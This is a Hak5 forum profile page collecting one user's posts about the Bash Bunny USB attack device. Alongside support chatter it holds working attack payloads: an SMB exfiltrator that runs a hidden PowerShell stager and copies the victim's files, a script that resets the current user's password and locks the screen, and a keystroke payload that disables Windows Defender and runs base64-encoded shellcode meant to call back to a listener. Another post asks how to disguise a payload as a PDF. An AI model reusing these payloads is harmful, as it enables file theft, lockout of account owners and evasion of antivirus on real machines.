Jump to content

jblk01

Active Members
  • Content Count

    28
  • Joined

  • Last visited

Everything posted by jblk01

  1. I know it can do keystroke injection, but what about things the Bunny can do? Such as pretending to be a second network adapter, give the target a second IP address and then run an nmap scan against the target? Edit: I just saw it has Ethernet, Serial etc. on the product page. Never mind. 🙂
  2. It's available here but doesn't seem to be listed on the Essentials Field Kit page. Any thoughts @Darren Kitchen?
  3. @Geesknees - Try to access the BB via SSH or Serial. If you wish to use SSH (my preferred method) then create a payload.txt file in either the switch1 directory or the switch2 directory and enter this: LED M FAST ATTACKMODE AUTO_ETHERNET Save the file, remove the Bunny and then reinsert it using whichever switch directory you used. Then ssh into it: ssh -l root 172.16.64.1 Password is: hak5bunny Then run: 'udisk unmount' and then run 'udisk reformat'. This should remove all of the old files on the user accessable partition.
  4. jblk01

    [Info] Tools

    @Foxtrot - As per my pull request on Github, I had to use a newer release of Impacket to achieve setting a username / password combo for the SMB server in my smb_exfiltrator v2 payload. Would you consider updating the .deb file here with the latest release of Impacket?
  5. @WV09 - I'm glad it works for you! My first time modifying a payload to that degree, so I was worried it might fail. I hope they add it to the main repo too.
  6. REM Play the Imperial March STRING while ($true) { ENTER STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000); ENTER STRING } ENTER Done 🙂
  7. Okay, I got it working on my machine so that Windows does not complain. Here is my pull request: https://github.com/hak5/bashbunny-payloads/pull/392 And the files are here: https://github.com/jblk01/bashbunny-payloads/tree/master/payloads/library/exfiltration/smb_exfiltratorV2.0
  8. @WV09 - I have updates. I factory reset my Bunny, then I installed the latest firmware (1.6). From there I did the following: You should now see a '-username' and a '-password' option. Setting these in the payload.txt along with telling Windows to authenticate with it via NET USE should make this work. I am now on my way to get my Windows 10 machine from my friend's place. I'll keep you posted.
  9. @WV09 - Try my modified version. It works correctly on both Bash Bunnies I own. I also added SMB ver. 2 support as well as slightly changed the LED pattern to suite my tastes. I even added extra file types in the s.ps1 file and I can share those if you'd like. 🙂 https://github.com/jblk01/bashbunny-payloads/blob/master/payloads/library/exfiltration/smb_exfiltrator/payload.txt
  10. Found a unique payload setup HERE. However I have read that moving the switch while the bunny is powered was dangerous, so would using this payload damage anything?
  11. Saw this cartoon drawing of the Bash Bunny on Twitter, and I've seen similar drawings of the LAN Turtle, Pineapple etc. Where can we find these? They would make awesome wallpapers!
  12. My mistake, I saw the reviews of the BB online and all photos came with a cable. It's not a big deal as one is $5 but I was just curious. Thanks for the links Darren.
  13. Grab the Impacket DEB file here, copy it to the /tools directory while in arming mode. Unplug and then replug the device in arming mode and it will be automatically installed. Also, I had to modify the payload.txt script because the attack would fail halfway through. Using my modification should work, as it works for both of my Bunnies unlike the payload.txt hosted on the Github page. Tools: My SMB exfiltrator script fix. If one can maybe improve it I'd be grateful:
  14. Same as the title says, if one is using the Twin Duck firmware, do you need to take out the microSD card, and hook it into an adapter in order to copy a new inject.bin file? Also, can one use this to store say a PDF, then hide the inject.bin so that you can seem innocent by asking someone to print off a PDF for you?
  15. I have ordered two Bash Bunnies so far, and the only thing inside the red packet is 1x Bash Bunny along with a card and Hak5 logo stickers. Did they stop including the cable and the BB logo stickers in the package?
  16. Try doing the three times as before, but all while in arming mode (switch closest to the USB part). But, instead of plugging it into a computer on the fourth try, I would suggest plugging it into a wall outlet using a block for smartphones. I can't remember the official name of them, the thing you charge a smarphone with that has a USB port on it. Let it sit with the police LED and don't unplug it until it starts pulsing blue with no red.
  17. When you say you tried a factory reset, could you expand on that? What steps did you take, and what did the LED do? I ask because some users have either mistakenly did the factory reset incorrectly, or they did not plug it into an adequate power source for the factory reset.
  18. Was having the blinking blue LED issue like a few other commenters, decided to fsck around and see what's what. Fixed it and added SMBv2 support to the script, with no changes made to the PowerShell script (s.ps1). @Darren Kitchen any chance these changes can be reflected on the official Github repo? #!/bin/bash # LED STATUS # ========== # FAIL........Failed to find dependencies # STAGE2......Ethernet Stage # SETUP.......HID Stage # SPECIAL.....Receiving Files # CLEANUP.....Moving Liberated Files # FINISH......Finished # # OPTIONS # ======= # Exfiltration options configured from included s.ps1 script ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Make temporary loot directory mkdir -p /loot/smb/ # Delete any old exfiltration data rm -rf /loot/smb/* # Copy new powershell payload to smb share cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ # Make loot directory on USB Disk mkdir -p /root/udisk/loot/smb_exfiltrator ######## ETHERNET STAGE ######## LED STAGE2 ATTACKMODE RNDIS_ETHERNET # Start the SMB Server python /tools/impacket/examples/smbserver.py -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & # Re-enable ICMP/echo replies to trip the powershell stager echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available GET HOST_IP LED SETUP ATTACKMODE HID RNDIS_ETHERNET RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\"" LED B 100 # Wait until files are done copying. while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /loot/smb/EXFILTRATION_COMPLETE # Move files to udisk loot directory mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator # Clean up temporary loot directory rm -rf /loot/smb/e/* # Sync file system sync ######## FINISH ######## # Trap is clean LED FINISH
  19. jblk01

    LockOutLoser

    I was bored earlier today and whipped this thing out, it sets the current users password to a random numeric string then locks the screen. ATTACKMODE HID # They don't lock their system(s)? Let's do it for them. :) # Plz improve this. LED SPECIAL5 Q GUI Q DELAY 500 Q STRING cmd Q DELAY 500 Q CTRL-SHIFT ENTER Q DELAY 500 Q LEFTARROW Q DELAY 500 Q ENTER Q STRING 'net user %username% %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%' Q ENTER Q STRING exit Q ENTER Q GUI l LED CLEANUP
  20. Hey guys, I'm working on a Powershell based payload for a project of mine, and I was hoping someone could tell me if / where I am going wrong? # Run Powershell as Admin LED M ATTACKMODE HID LED ATTACK Q DELAY 500 Q GUI Q DELAY 1000 Q STRING powershell Q DELAY 500 Q CTRL-SHIFT ENTER Q DELAY 500 Q LEFTARROW Q DELAY 500 Q ENTER # Shutdown AV LED FAIL3 Q DELAY 1000 Q STRING Set-MpPreference -DisableRealtimeMonitoring \$true Q DELAY 500 Q ENTER Q DELAY 500 Q STRING New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\"Windows Defender"' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force Q ENTER Q STRING exit Q ENTER # Run Powershell as regular user Q DELAY 500 Q GUI r Q STRING powershell Q ENTER LED SPECIAL5 Q DELAY 500 Q STRING powershell -w 1 -C "sv X -;sv TR ec;sv H ((gv X).value.toString()+(gv TR).value.toString());powershell (gv H).value.toString() 'JABUAFgAIAA9ACAAJwAkAFUASAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHkAVgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUASAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB2AFEAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADIALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB4ADQAOAAsADAAeAAwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADYAOQAsADAAeAA2AGUALAAwAHgANgA5ACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMwAxACwAMAB4AGQAYgAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgANQA2ACwAMAB4ADcAOQAsADAAeABhADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAYgBiACwAMAB4ADAAMQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4AGUAOAAsADAAeABiADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgBmACwAMAB4ADUANQAsADAAeAA1ADYALAAwAHgANAA4ACwAMAB4ADUAZgAsADAAeAA2ADMALAAwAHgANQA2ACwAMAB4ADMAMAAsADAAeAA1ADAALAAwAHgANAA1ACwAMAB4ADQANAAsADAAeAA0ADQALAAwAHgANgBkACwAMAB4ADUAMQAsADAAeAAyAGQALAAwAHgANgA0ACwAMAB4ADQAMwAsADAAeAA3ADUALAAwAHgANwAxACwAMAB4ADMANQAsADAAeAA2AGIALAAwAHgANQAwACwAMAB4ADYANwAsADAAeAA1ADUALAAwAHgANQA5ACwAMAB4ADcANQAsADAAeAA1ADEALAAwAHgAMwA2ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgAMAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgANQA3ACwAMAB4ADgAOQAsADAAeAA5AGYALAAwAHgAYwA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA5ACwAMAB4AGMANgAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAzADIALAAwAHgAZQAwACwAMAB4ADgANAAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAZQBiACwAMAB4ADUANQAsADAAeAAyAGUALAAwAHgAMwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA2ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANQBmACwAMAB4ADYAOAAsADAAeAA4ADAALAAwAHgAMwAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAOAA5ACwAMAB4AGUAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgAMQBmACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgANwA1ACwAMAB4ADQANgAsADAAeAA5AGUALAAwAHgAOAA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMgBkACwAMAB4ADAANgAsADAAeAAxADgALAAwAHgANwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAMQA2ACwAMAB4ADYAOAAsADAAeAA4ADgALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADQANAAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAYwBkACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADgAOQAsADAAeABlADcALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMQAyACwAMAB4ADkANgAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAYwBkACwAMAB4ADgAYgAsADAAeAAwADcALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADYAOQAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANAAsADAAeAAwADAAOwAkAGYAZgAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB2AFEALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZgBmACAAPQAgACQAdgBRAC4ATABlAG4AZwB0AGgAfQA7ACQASABGAD0AJAB5AFYAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABmAGYALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABrAGEAPQAwADsAJABrAGEAIAAtAGwAZQAgACgAJAB2AFEALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAawBhACsAKwApACAAewAkAHkAVgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEgARgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABrAGEAKQAsACAAJAB2AFEAWwAkAGsAYQBdACwAIAAxACkAfQA7ACQAeQBWADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABIAEYALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAHkAVgBDACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFQAWAApACkAOwAkAFQAegAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAB1AG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAdQBtACAAJABUAHoAIAAkAHkAVgBDACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFQAegAgACQAeQBWAEMAIgA7AH0A'" Q DELAY 500 Q ENTER LED CLEANUP The AV kill works, but when trying to use the Powershell Alphanumeric Shellcode Injector from the Social Engineering Toolkit results in the Windows 7 / Windows 10 machine not connecting back to my listener. I'm still tinkering with it, but in the meantime would anyone have an idea on how I can improve this?
  21. Care to share how you did this? Maybe a github link? I love the idea of the BB doing some of my sysadmin work for me. 😂
  22. Is the Bash Bunny still being actively developed? The latest firmware upgrade was in late 2017. I just got my BB in and I love how it is like a Rubber Ducky on steroids.
×
×
  • Create New...